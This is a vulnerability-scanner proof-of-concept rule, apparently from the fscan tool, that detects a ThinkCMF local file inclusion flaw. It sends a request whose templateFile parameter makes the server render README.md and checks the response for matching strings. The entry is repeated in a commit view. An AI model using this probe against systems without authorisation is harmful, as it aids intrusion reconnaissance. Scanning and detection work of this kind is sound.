fscan/WebScan/pocs/thinkcmf-lfi.yml

name: poc-yaml-thinkcmf-lfi

rules:
  - method: GET
    path: "/?a=display&templateFile=README.md"
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README")))

detail:
  author: JerryKing
  ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2
  links:
    - https://www.freebuf.com/vuls/217586.html
commit message 2020-12-29 01:17:10 -08:00			`name: poc-yaml-thinkcmf-lfi`

			`rules:`
			`- method: GET`
			`path: "/?a=display&templateFile=README.md"`
			`expression: \|`
			`response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README")))`

			`detail:`
			`author: JerryKing`
			`ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2`
			`links:`
			`- https://www.freebuf.com/vuls/217586.html`